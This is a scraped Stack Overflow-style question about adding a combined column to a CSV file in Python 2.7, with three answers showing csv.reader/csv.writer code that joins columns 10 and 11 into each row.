| 2 | 2016-09-27T19:49:28Z | 39,733,317 | <p>No input to test, but try this. Your current approach doesn't include the existing data for each row that already exists in your input data. <code>extend</code> will take the list that represents each row and then add another item to that list... equivalent to adding a column.</p>
<pre><code>import CSV
with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
row.extend([str(row[10]) + ' ' + str(row[11])])
writefile.writerow(row)
</code></pre>
| 2 | 2016-09-27T20:00:20Z | [
"python",
"python-2.7",
"csv"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
| 2 | 2016-09-27T19:49:28Z | 39,733,574 | <p>I assume that glayne wants to combine column 10 and 11 into one.
In my approach, I concentrate on how to transform a single row first:</p>
<pre><code>def transform_row(input_row):
output_row = input_row[:]
output_row[10:12] = [' '.join(output_row[10:12])]
return output_row
</code></pre>
<p>Once tested to make sure that it works, I can move on to replace all rows:</p>
<pre><code>with open('data.csv') as inf, open('out.csv', 'wb') as outf:
reader = csv.reader(inf)
writer = csv.writer(outf)
writer.writerows(transform_row(row) for row in reader)
</code></pre>
<p>Note that I use the <code>writerows()</code> method to write multiple rows in one statement.</p>
| 0 | 2016-09-27T20:17:16Z | [
"python",
"python-2.7",
"csv"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
| 2 | 2016-09-27T19:49:28Z | 39,734,557 | <p>Each row is read as a list, so you can append to it by adding another list (e.g. the new column value). Your current code is simply writing the new column value.</p>
<pre><code>with open('data.csv') as fin, open('out.csv', 'wb') as fout:
reader = csv.reader(fin)
writer = csv.writer(fout)
for row in reader:
new_col_value = [str(row[10]) + ' ' + str(row[11])]
writer.writerow(row + new_col_value)
</code></pre>
| 0 | 2016-09-27T21:26:03Z | [
"python",
"python-2.7",
"csv"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.